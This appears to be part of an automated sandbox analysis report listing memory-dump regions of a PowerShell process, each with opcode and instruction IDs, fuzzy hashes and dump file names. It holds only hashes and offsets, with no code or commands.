                                                                                                                                                                                                                                                        • Opcode ID: 81f5ef5545c47cc5e468697e11be7d3f1a2ff59b6d8c617c480a0cc68abed9d9
                                                                                                                                                                                                                                                        • Instruction ID: bea385cda025ff6725401d0555d556b1067971d10fb9a5159e86ae4709ec1daa
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81f5ef5545c47cc5e468697e11be7d3f1a2ff59b6d8c617c480a0cc68abed9d9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76A1A174E102099FDB14CFA9D980ADDBBF2FF88310F14846AE818A7355D731AA52CF90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7310000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9657f8234628878fad5addb5f7635766a205d0166d6dcc5c62838968f0e43ca5
                                                                                                                                                                                                                                                        • Instruction ID: b4d791e41c067af347a153090596c24126d94b01ff1e676c94fa4bab431258df
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9657f8234628878fad5addb5f7635766a205d0166d6dcc5c62838968f0e43ca5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63411AB3B003159FEB58AA7994002AEBBE5AFD4210F24816ADC0A9B655DA32DD01C7E5
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193151493.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c30000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f06adc39054e86424f2bdbe25039487be517ad25adce6fb7822c564b54002c9c
                                                                                                                                                                                                                                                        • Instruction ID: 5c7de7b887e1fd3cc7b6d16951623a91f933c46df7bbba20df5cc0be38abcb3a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f06adc39054e86424f2bdbe25039487be517ad25adce6fb7822c564b54002c9c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4241F232B00626CFCB04DF68C884A6AFBB1FF49310F158699D52A9B391D730E941CBD4
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57162315970.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_e00000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c0fe198818ce15b65425806cd9ffb3db466c090ebf14bb73322dec704ed4db3a
                                                                                                                                                                                                                                                        • Instruction ID: cff31c6711486cf6a5e7b823b71e48788451c5bef1f35d0140980e0e774b6ca8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0fe198818ce15b65425806cd9ffb3db466c090ebf14bb73322dec704ed4db3a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F951C674A002099FDB54CBA8D594AADFBF2BF88314F24C559E405BB3A5C735ED82CB90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2bf8649d8deae32fca1983d89a7c5d506ee25cd5ca7b6e8bd05e37ed5e5424fb
                                                                                                                                                                                                                                                        • Instruction ID: 07ea8750b0a67a2f35b97749b961445ee5ecf95ce548d7f3f654c9e5d395f7b8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2bf8649d8deae32fca1983d89a7c5d506ee25cd5ca7b6e8bd05e37ed5e5424fb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E51B374E01208DFDB58DFBAD954ADEBBB2BF88344F20912AE415AB364DB319945CF40
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57162315970.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_e00000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 144d1a885ac590aeec6b1e80d526ebb5fc0e316c5b609e79790e267db77d19e0
                                                                                                                                                                                                                                                        • Instruction ID: 214afaac85655c8ce3b3a67702cdb552c9326e4524f687782686f57ff788e9d0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 144d1a885ac590aeec6b1e80d526ebb5fc0e316c5b609e79790e267db77d19e0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2951E734A00209DFDB15CB98D584A9DBBF2BF88314F248559E405BB3A5C771AD82CB90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193473310.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c60000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f8fe4d7e03029424abff631b16446c90e59d9399355511999e62fc5db2335851
                                                                                                                                                                                                                                                        • Instruction ID: 0f09597d448c4f045a84ddc988aed1ce00c9992e814bd2d5a088db0a6dc680ad
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8fe4d7e03029424abff631b16446c90e59d9399355511999e62fc5db2335851
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E941B234B40108DFD748DF59D540A6D77E6EF88310BA58159E905AF350CB32EE02CBA5
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57162315970.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_e00000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b05ed844c90fff7c1d666569083de1a12b7f167ff1192f647eeef5f96a410781
                                                                                                                                                                                                                                                        • Instruction ID: ceceb027690a49c0091e92db16addde35ea0606ed8b73c7ee245558e4ae5efb4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b05ed844c90fff7c1d666569083de1a12b7f167ff1192f647eeef5f96a410781
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F10145316147448FCF05DF69E8844AEBBB1EFD531472045BAC889AB3A3D6358D06CBE1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 786f2beb3126e894032c94d1e6e57f959c2dbcdab9b5645ef24ba7bea4916043
                                                                                                                                                                                                                                                        • Instruction ID: 165ae584a5afa9c098a1554c68a2ae9cd5a9f55d38baead31631741b51cc4c12
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 786f2beb3126e894032c94d1e6e57f959c2dbcdab9b5645ef24ba7bea4916043
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79410775E152089FDB54DFA9D495AEEBBF2FF89300F10806AE90AA7350DB319941CF90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: dc3aa1f7d7ad51b75cc619e5ce517894cd3bfcd80d1bc4b5b3e9b5f3e861ffa8
                                                                                                                                                                                                                                                        • Instruction ID: 35624e8aca741e726b33c5805e37bd1d2038b9bd0f26044075158f7ca5ca5a99
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc3aa1f7d7ad51b75cc619e5ce517894cd3bfcd80d1bc4b5b3e9b5f3e861ffa8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF414574E15208CFDB84CFAAD895AEEBBF2EB88300F14816AE505E3240D7744A49CFD1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193151493.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c30000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: bc084a30e5a467c1502647f600861943fb439605ac792872288d69c52c3ab42e
                                                                                                                                                                                                                                                        • Instruction ID: b3ac7936ea6870af57128bca04517895cce16bc9694bb05fb1c4b1637bc0ac94
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc084a30e5a467c1502647f600861943fb439605ac792872288d69c52c3ab42e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6931BF713041E48FDB46DF29C894AAA7BE5EF8A311B0980AAF849CB271C731DC51CB20
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193151493.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c30000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 15ace0b61961263d0973bff1d34826a2a3e0b803a1c67a4d70c38cee7dff023c
                                                                                                                                                                                                                                                        • Instruction ID: 0b9fb1788b070c351664c0bd25fc96eb06094aaeedbc7ad0d82d73ed685fece2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15ace0b61961263d0973bff1d34826a2a3e0b803a1c67a4d70c38cee7dff023c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD412734A112288FEBA4DF24CC91FA9B7B1FB49310F1401D9EA09AB391D631EE81CF50
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57162315970.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_e00000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 725cc2a17f5622c0d31b84a64bce7fe04b1618a736366d87f1a17c762cfc8a73
                                                                                                                                                                                                                                                        • Instruction ID: c1b479b49db90717ee7a751620813aaa4e9ac8bd30a678a816a7e15f816bc54c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 725cc2a17f5622c0d31b84a64bce7fe04b1618a736366d87f1a17c762cfc8a73
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A801F9317143809FCB05DF689C544AEBBB1EFDA21171141BBD449EB3A3D6349D0987A1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57162315970.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_e00000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3aa1ebdb2caac49a6cfc6c03656419874baa8874f03f4f262ad67572f67a0b58
                                                                                                                                                                                                                                                        • Instruction ID: 8a8d2c4966ed706a5b667ea84db6b235b072331b3a5dbfc4340d7fb6d5e86a5d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3aa1ebdb2caac49a6cfc6c03656419874baa8874f03f4f262ad67572f67a0b58
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93318E74A043498FCB01DFA9C49099ABBB0FF4A320B214196D855EB3A2D631EC45CBA9
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: dccc2361e7039d7257899c1537d9a9ef0e5aa6a104cd1a8209b43b5c97e9b8f0
                                                                                                                                                                                                                                                        • Instruction ID: 830edc46a40c3507861e16b9675f8e0e6b68947e75e67c34d9c4e2cf8b19117a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dccc2361e7039d7257899c1537d9a9ef0e5aa6a104cd1a8209b43b5c97e9b8f0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E441F775E152099FDB44DF99D495AEEBBF2FF88300F10802AE909A7350DB31A941CF90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7310000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 526b04513048ded094e67f909043a5dc0ca722b24f2bfeeb29d9ae0e4532bc08
                                                                                                                                                                                                                                                        • Instruction ID: bb31620527f86ef22db9f8e1424660c00b7457dca3aa57f15461feb3fd8c9b69
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 526b04513048ded094e67f909043a5dc0ca722b24f2bfeeb29d9ae0e4532bc08
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73218BB23243849BF76856754800BAA7BF6AFD1710F64841AEA09EF3C2D9619C408326
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7310000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 318ae2eb992ba1647c6b307b9341908769aa2d960ff748c4f4398fbbe3e204e3
                                                                                                                                                                                                                                                        • Instruction ID: ec4ab0748a4fa5f46315dc38088f76539e031a3ee4ed09eb91a2464125ff42ce
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 318ae2eb992ba1647c6b307b9341908769aa2d960ff748c4f4398fbbe3e204e3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E2138B23102599BF77C55BA88007B6B7EAAFC5610F60842EEA09DB385DD72DC418361
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: cc2a7f55e4a87b3ffc848ef5b0d6be0f064b0771caee23e0c781c836bad1b5d5
                                                                                                                                                                                                                                                        • Instruction ID: 83555527244a2b4edab17185395b62f98e46fafe8ece27a2bbc2b8738c2f41de
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc2a7f55e4a87b3ffc848ef5b0d6be0f064b0771caee23e0c781c836bad1b5d5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8312374E14208CFDB44DFAAE4856EEBBF6BB88304F109065E806A7354DB305A42CF91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 514a43ac1813a8a90bcb3faecfe89bf933bce948c381c92ebe4b3ec50f776eaf
                                                                                                                                                                                                                                                        • Instruction ID: a281e467e50811a6dfab0c6780c3a8046bc1f068a5bb8b195140db7de631ed7f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 514a43ac1813a8a90bcb3faecfe89bf933bce948c381c92ebe4b3ec50f776eaf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F3112B0E14208CFDB84CFAAD555AEEBBF6EB88300F10812AE409E3240D7745A45CFD1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57162315970.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_e00000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 41048fb5093d8769aa819a18442444345cc7d8f014f32a0b9c5f8480a3aa305e
                                                                                                                                                                                                                                                        • Instruction ID: c3f3e032a097df2bdff0a14f596a2407b5519704c2a3e48ed04fcb848791f7a0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41048fb5093d8769aa819a18442444345cc7d8f014f32a0b9c5f8480a3aa305e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8212872300245AFD720DF68D855FAEBBAAEF89710F2080AAF614DF2D1DA319D15C750
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7310000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ebc4625c69161c916a9c9f166aeed4ad68f8766119d8fd3662401cb1253d9115
                                                                                                                                                                                                                                                        • Instruction ID: 7495f5cd77adeef07e0aa6a6fa6306443132e001e6269148a13ee38ab83604f3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ebc4625c69161c916a9c9f166aeed4ad68f8766119d8fd3662401cb1253d9115
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C2128B3A013559FDB499E7988002EABFF5AF85210B2580AADC09EB351E735DE41C7F0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57160980799.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_930000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4ac5f14e3781d35fb8aae68722e8818767b3abd750e3c349aeac16414b913651
                                                                                                                                                                                                                                                        • Instruction ID: 0700f21e93d4ca4f4749ea3ac8dc999ea840c510f44c391a46156793fee40a91
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ac5f14e3781d35fb8aae68722e8818767b3abd750e3c349aeac16414b913651
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 773136B4E08209CFDB14DFA9D9483EEFBF2AB88300F208569D509A32A1D7791945CF91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193151493.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c30000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 43021a0c86f3a822e0254ca2dfe1d1ac7ccff0d4af63432a6ed51e63f8a9af86
                                                                                                                                                                                                                                                        • Instruction ID: d83b47d4b2c302f34df8ed067cc4696b7308e7dd40f60de406b9920bd03acf64
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43021a0c86f3a822e0254ca2dfe1d1ac7ccff0d4af63432a6ed51e63f8a9af86
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87213931E00228DFEF90DAB9D804BAEBBE5AF04340F10806AD515DB290E738DB51CB91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57161538809.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_afd000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b84318768ed340226e7ebbe92b2ebc5f857c98f47b3844d2fb22edf6638475fc
                                                                                                                                                                                                                                                        • Instruction ID: d8d5f54b1a1f5dac42a742af6011dbed79768110974ac95032ef8eef1e698690
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b84318768ed340226e7ebbe92b2ebc5f857c98f47b3844d2fb22edf6638475fc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 882104B1504348EFDB06DF54D9C0B26BB76FB88314F24C669FA091B246C336D856CBA6
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193151493.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c30000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9b8e430cb1c269c0bdfc00124a2318c260c92269f184182ad3b7910a52b4783c
                                                                                                                                                                                                                                                        • Instruction ID: 3e699ffe2d7737a67ab8833bb420b913bddf9090c05e79052180c354a850873e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b8e430cb1c269c0bdfc00124a2318c260c92269f184182ad3b7910a52b4783c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D511C675C053989FDF52DB7498106EA7BB0AF02201F558097D040EB153E23D870ACBA1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 6b5fff2cb6876d2427081a40238c4c426d5d5a9fa8fcd1d96e4de419bd28fda1
                                                                                                                                                                                                                                                        • Instruction ID: c126339bbbbd202b6adb69df41cf000dc7cd68f2b3b073f8ff365615e9d54400
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6b5fff2cb6876d2427081a40238c4c426d5d5a9fa8fcd1d96e4de419bd28fda1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2213B74E14309CFDB54DFAAD4416AEBBB5FB44345F10D1A9E425A7280D7346982CF90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57160980799.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_930000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 687f5c598168d2fe345be70e6fccdafc8885ddfd508f7f2d3bf28382f69b1a17
                                                                                                                                                                                                                                                        • Instruction ID: 9327ec4c215e19a15c3ab8df215fc1894b19b6c1ae9c4cc9f450a0b42282b75e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 687f5c598168d2fe345be70e6fccdafc8885ddfd508f7f2d3bf28382f69b1a17
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24213974E15219CBDF04DFA5C5086EEBBB6EB8C315F10882AE405B3280E7744A45CFA1
                                                                                                                                                                                                                                                        Memory Dump Source
